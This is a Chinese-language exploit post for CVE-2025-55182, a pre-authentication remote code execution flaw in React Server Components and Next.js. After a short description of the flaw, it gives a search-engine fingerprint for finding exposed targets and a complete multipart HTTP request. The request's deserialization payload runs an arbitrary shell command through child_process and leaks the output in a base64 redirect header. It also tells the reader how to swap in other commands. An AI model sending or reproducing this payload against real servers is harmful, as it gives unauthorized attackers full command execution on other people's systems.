一、漏洞信息
CVE-2025-55182 是 React Server Components (RSC) 架构中一个关键的预认证远程代码执行 (Pre-Auth RCE) 漏洞,影响了包括 react-server-dom-webpack 在内的多个 RSC 相关包的 19.x 版本。该漏洞的根本原因在于 RSC 暴露的 Server Function endpoints 在处理传入的 HTTP 请求负载时,进行了不安全的非序列化 (Insecure Deserialization)。攻击者无需任何权限,即可利用这一缺陷,通过构造恶意的请求体,在运行 RSC 服务的服务器上执行任意系统命令,从而完全控制目标应用程序及其底层系统。
二、应用指纹
搜索引擎:GOBY
app="Next.js" && body="/_next/static/chunks/app/"三、利用细节
发包选择一个有效的路径,然后修改execSync(‘id’)中的命令,在响应包中查看响应头:x-action-redirect: /login?a=<base64>中的base64数据,进行解码即可获取命令执行回显。
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 705
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
X-Nextjs-Html-Request-Id: jtw4ZxyMLoj8nze6q010h
X-Nextjs-Request-Id: hcra8cg2
Accept-Encoding: gzip
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res = Buffer.from(process.mainModule.require('child_process').execSync('id')).toString('base64');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--![图片[1] - 【CVE-2025-55182】React Server Components 远程命令执行漏洞 - 极核GetShell](https://get-shell.com/wp-content/uploads/2025/12/CVE-2025-55182-1.png)
四、POC文件
验证程序:Nuclei
THE END
暂无评论内容